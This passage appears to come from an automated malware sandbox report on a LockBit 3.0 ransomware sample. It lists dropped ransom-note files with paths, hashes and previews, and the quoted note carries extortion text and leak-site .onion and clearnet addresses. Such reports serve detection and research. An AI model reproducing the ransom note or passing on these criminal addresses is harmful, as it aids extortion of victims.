                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.976111294661232
                Encrypted:false
                SSDEEP:192:EnvJz0zOPwlCW6nWjkM6bgLCKAf59b91P7R92Z/6o:ERz0zOYlX6WZ6bi/AxJ9xlo/D
                MD5:76A98FED6DD18F2B07B6FCA6504F8B6F
                SHA1:245E18F5D252DD1EF5EF0D6FF775B326F375CBD2
                SHA-256:6706B63146E8755509038838B0529600B3F3F2E3F878D4C584EACEFBE48C8A42
                SHA-512:CB040533253615E49CA9D348D19C736CFBC28884FCA118EF482B546C74E89F7A8189C7CEAC0C79505C33743F891E81479645A053DEE6D685391E78510B768CCE
                Malicious:false
                Preview:..R...*.Q}&....x.... ...QhK2.l.. w..b.D..F......4......T....._....WAy..o.rj..|.U6N!..l...%.~cdxY...R...e.D.<..#jl...VY.r.......a..)Nc.%.\........=w.....2....3.W....*%.v....5=..d(f].......li..).......&.a.Foq.r_3...d/fi.2.;.!..IQ.dY]..#.[.y..m...s..hb...%...........m..-.f/f...'.U..P.w*~8.9 W.....U....D.r.|..1....#.O.W..$.$..exW}...J...g9.j|..xB.jy...O......#j....JI...<..@..-.Cc.$.]...m6....[L...)".k.E..n\Dh}..7..K..&....u*N&.C..t.K.U..A.-A...K....A.<....k.....5.Zd.....r?#TI.p..?....=,%?p#S\=......tZ.Jo.....1p..K..+RS.3.:n....?...S)T=l..7.gg..*P...t..F.1..........Z....,_v..c.........V..x./......I.& ..n...5.....Id.m.V.W.(..@...F..s.>...pq.....,|.4.+r..J6q../.S.%pE<....wu<..\8..>.N"U._.l'..F&.7..V..>.......:..R..F..M.3,..m2lK....T5.\S..r7 ...u......... ...'\....@...v_...........R......K..u.x....ic\.$......f.....N..Zj.5.W{[+.....T......oD..`N...M'$.9...L.b.......7.. 6@.3N.....+<..H..n[b../.......k....r.M.O~. ..H]H.Z(.4...v...........d1.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
